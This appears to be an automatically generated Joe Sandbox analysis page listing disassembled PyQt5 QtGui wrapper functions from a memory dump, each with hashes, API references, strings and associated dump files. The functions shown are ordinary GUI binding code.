Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?geometry@FromLongLong_Rect@@Window@@
String ID: QWindow$width$width(self) -> int
API String ID: 464342472-100540950
Opcode ID: fa31a363e68b82887f24093a34445cb45b253b22dbf18a58082f74a7224395de
Instruction ID: 5a458ce206278f8927c789262a13cfffb1b9b0a83f1dca8485e040cb2d723dac
Opcode Fuzzy Hash: fa31a363e68b82887f24093a34445cb45b253b22dbf18a58082f74a7224395de
Instruction Fuzzy Hash: E501ED76B18B4AC1DB40EF14E898AAD37A4FB84B64F954076D64D03320DF3DE949C740

Function 00007FFD86256C90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

?geometry@QWindow@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FFD86256CE0
PyLong_FromLong.PYTHON3 ref: 00007FFD86256CEE

Strings

QWindow, xrefs: 00007FFD86256D13
height(self) -> int, xrefs: 00007FFD86256D00
height, xrefs: 00007FFD86256D0C

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?geometry@FromLongLong_Rect@@Window@@
String ID: QWindow$height$height(self) -> int
API String ID: 464342472-1651948259
Opcode ID: 4b78b789c453e7af974399f882809ccc67094727bff92383b9763280752be7e8
Instruction ID: 433bb8b12c769ef408b1deae62fe4a248bcfd0851fc11a8845ba7d36e1d0acac
Opcode Fuzzy Hash: 4b78b789c453e7af974399f882809ccc67094727bff92383b9763280752be7e8
Instruction Fuzzy Hash: 0401EDB6B18B4AC5DB00DF55E898AAD37A4FB44B64F954076C64D03320DF3DE949C740

Function 00007FFD86292DF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

?boolProperty@QTextFormat@@QEBA_NH@Z.QT5GUI ref: 00007FFD86292E47
PyBool_FromLong.PYTHON3 ref: 00007FFD86292E50

Strings

boolProperty, xrefs: 00007FFD86292E6E
boolProperty(self, propertyId: int) -> bool, xrefs: 00007FFD86292E62
QTextFormat, xrefs: 00007FFD86292E75

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?boolBool_Format@@FromLongProperty@Text
String ID: QTextFormat$boolProperty$boolProperty(self, propertyId: int) -> bool
API String ID: 3344510876-2502544517
Opcode ID: 6a11ad373292249bda35bfbe95ae1a69e820ad80746d90a4da46812f237e3460
Instruction ID: 72cf9149e213a91c09da4a1de7c526828bd32c5f39b6b5f2552d48b913c4faa8
Opcode Fuzzy Hash: 6a11ad373292249bda35bfbe95ae1a69e820ad80746d90a4da46812f237e3460
Instruction Fuzzy Hash: 07011B75B18E46D2EB00EF25E898AAD33A5FB44B64FA54032CA5D43320DF3DD94AC740

Function 00007FFD8629ACA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

?percentAtLength@QPainterPath@@QEBANN@Z.QT5GUI ref: 00007FFD8629ACF9
PyFloat_FromDouble.PYTHON3 ref: 00007FFD8629ACFF

Strings

QPainterPath, xrefs: 00007FFD8629AD24
percentAtLength, xrefs: 00007FFD8629AD1D
percentAtLength(self, t: float) -> float, xrefs: 00007FFD8629AD11

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?percentDoubleFloat_FromLength@PainterPath@@
String ID: QPainterPath$percentAtLength$percentAtLength(self, t: float) -> float
API String ID: 2315394295-557594903
Opcode ID: 6033a21c8c33fa2f30e29c0a693ba4faa524f5454a3c00e51cec6d07da8952dd
Instruction ID: 5b0724d28b156307b45a3a6cba90a57ba79a0b1c89677fbfff6e287294a77146
Opcode Fuzzy Hash: 6033a21c8c33fa2f30e29c0a693ba4faa524f5454a3c00e51cec6d07da8952dd
Instruction Fuzzy Hash: E101D775B18E46D2EB00EF25E8A96AD33A5FB44B65F954072CA5D03320DF3DD98AC740

Function 00007FFD86280A90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?charFormatIndex@QTextFragment@@QEBAHXZ.QT5GUI ref: 00007FFD86280ADB
PyLong_FromLong.PYTHON3 ref: 00007FFD86280AE3

Strings

QTextFragment, xrefs: 00007FFD86280B08
charFormatIndex, xrefs: 00007FFD86280B01
charFormatIndex(self) -> int, xrefs: 00007FFD86280AF5

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?charFormatFragment@@FromIndex@LongLong_Text
String ID: QTextFragment$charFormatIndex$charFormatIndex(self) -> int
API String ID: 4186486972-3739996337
Opcode ID: 5b973f7ba5dceecf1c53da7d16b5e063c4367f245a1d99b7dfa877cc56ec3246
Instruction ID: bcc70a8e28a4b44117131929851ddef384f1ac91e294d4df0f9fbfe3942308ee
Opcode Fuzzy Hash: 5b973f7ba5dceecf1c53da7d16b5e063c4367f245a1d99b7dfa877cc56ec3246
Instruction Fuzzy Hash: 76012C75B08B46C1EB00DF64E8686AD33A8FB44764F954072CA5D43320DF7DD949C340

Function 00007FFD8624CA70 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?isTopLevel@QWindow@@QEBA_NXZ.QT5GUI ref: 00007FFD8624CABB
PyBool_FromLong.PYTHON3 ref: 00007FFD8624CAC4

Strings

QWindow, xrefs: 00007FFD8624CAE9
isTopLevel, xrefs: 00007FFD8624CAE2
isTopLevel(self) -> bool, xrefs: 00007FFD8624CAD6

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLevel@LongWindow@@
String ID: QWindow$isTopLevel$isTopLevel(self) -> bool
API String ID: 1294801316-1879893885
Opcode ID: b9361ac5bfe34ab3730f266c7a98601139432ae63005fc670ae981828ce69357
Instruction ID: bdd6be725aa987b0b009d370b7bd033f86a08685f606fc75dcc4c03de68f7813
Opcode Fuzzy Hash: b9361ac5bfe34ab3730f266c7a98601139432ae63005fc670ae981828ce69357
Instruction Fuzzy Hash: D7012875B08A4AD1EB00EF55E8A86AC33A4FB44B65F950072CA5D03320DF7CDA8AC340

Function 00007FFD86288A60 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?mousePressAndHoldInterval@QStyleHints@@QEBAHXZ.QT5GUI ref: 00007FFD86288AAB
PyLong_FromLong.PYTHON3 ref: 00007FFD86288AB3

Strings

mousePressAndHoldInterval(self) -> int, xrefs: 00007FFD86288AC5
mousePressAndHoldInterval, xrefs: 00007FFD86288AD1
QStyleHints, xrefs: 00007FFD86288AD8

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?mouseFromHints@@HoldInterval@LongLong_PressStyle
String ID: QStyleHints$mousePressAndHoldInterval$mousePressAndHoldInterval(self) -> int
API String ID: 3851309034-3065577231
Opcode ID: d23e5071142c3287c6203e90dcb0673ec5dc7b428e0a3682a812f584741c8f8e
Instruction ID: 845586e9ca4bae4b1f4fa095d17423505dfd32a0c85e2040d79877ea542db197
Opcode Fuzzy Hash: d23e5071142c3287c6203e90dcb0673ec5dc7b428e0a3682a812f584741c8f8e
Instruction Fuzzy Hash: 35011675B08A4681EB00AF64E8A86AC33A4FB44BA4F954072CA5D47320DF7CDA99C380

Function 00007FFD8625EAD0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?doubleProperty@QTextFormat@@QEBANH@Z.QT5GUI ref: 00007FFD8625EB20
PyFloat_FromDouble.PYTHON3 ref: 00007FFD8625EB26

Strings

QTextFrameFormat, xrefs: 00007FFD8625EB4B
margin(self) -> float, xrefs: 00007FFD8625EB38
margin, xrefs: 00007FFD8625EB44

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?doubleDoubleFloat_Format@@FromProperty@Text
String ID: QTextFrameFormat$margin$margin(self) -> float
API String ID: 2584946227-3425865904
Opcode ID: b8b1cd1207d262e279976f96b512870bae83aedae777f3f16857fa09cf033234
Instruction ID: 076d48addf5dff983da94401a40ee15056b143a87e2c68129cdc7adc0a8559b4
Opcode Fuzzy Hash: b8b1cd1207d262e279976f96b512870bae83aedae777f3f16857fa09cf033234
Instruction Fuzzy Hash: D6011A75B08A46C1EB00AF54E8596AD37A4FB44B64F954072CA4D43320DF7DDA8AC740

Function 00007FFD86286AC0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?startDragVelocity@QStyleHints@@QEBAHXZ.QT5GUI ref: 00007FFD86286B0B
PyLong_FromLong.PYTHON3 ref: 00007FFD86286B13

Strings

startDragVelocity, xrefs: 00007FFD86286B31
startDragVelocity(self) -> int, xrefs: 00007FFD86286B25
QStyleHints, xrefs: 00007FFD86286B38

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?startDragFromHints@@LongLong_StyleVelocity@
String ID: QStyleHints$startDragVelocity$startDragVelocity(self) -> int
API String ID: 341840558-551471616
Opcode ID: daa4c72b44f5eef70410c6fbe571e4f18450a2e2d8345e1641170cb26949b7ce
Instruction ID: c14531fd1697bb240db10009208b2ab878406fdc6973a6f12489516bb3522875
Opcode Fuzzy Hash: daa4c72b44f5eef70410c6fbe571e4f18450a2e2d8345e1641170cb26949b7ce
Instruction Fuzzy Hash: 8C012875F08A46D1EB00EF64E8A96AD33A4FB44BA4F950072CA5D43320DF7DDA5AC380

Function 00007FFD8624CEA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?isModal@QWindow@@QEBA_NXZ.QT5GUI ref: 00007FFD8624CEEB
PyBool_FromLong.PYTHON3 ref: 00007FFD8624CEF4

Strings

isModal(self) -> bool, xrefs: 00007FFD8624CF06
QWindow, xrefs: 00007FFD8624CF19
isModal, xrefs: 00007FFD8624CF12

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLongModal@Window@@
String ID: QWindow$isModal$isModal(self) -> bool
API String ID: 687368324-3086944722
Opcode ID: 3f7a51e7f6cdede46eb0691d2b2ecdbb06304233619be7c74fe1b0feb7a5c8f9
Instruction ID: bef5bd2dc907b0e0bfa1185919b857bfb13c68e22c8bf1d4c22a25da74c6b336
Opcode Fuzzy Hash: 3f7a51e7f6cdede46eb0691d2b2ecdbb06304233619be7c74fe1b0feb7a5c8f9
Instruction Fuzzy Hash: 82012C75B08A86D1EB00EF54E8A96AC33A4FB44764F950072CA5D03320DF7CD999C340

Function 00007FFD86232F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?isUndoAvailable@QTextDocument@@QEBA_NXZ.QT5GUI ref: 00007FFD86232F4B
PyBool_FromLong.PYTHON3 ref: 00007FFD86232F54

Strings

isUndoAvailable, xrefs: 00007FFD86232F72
isUndoAvailable(self) -> bool, xrefs: 00007FFD86232F66
QTextDocument, xrefs: 00007FFD86232F79

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
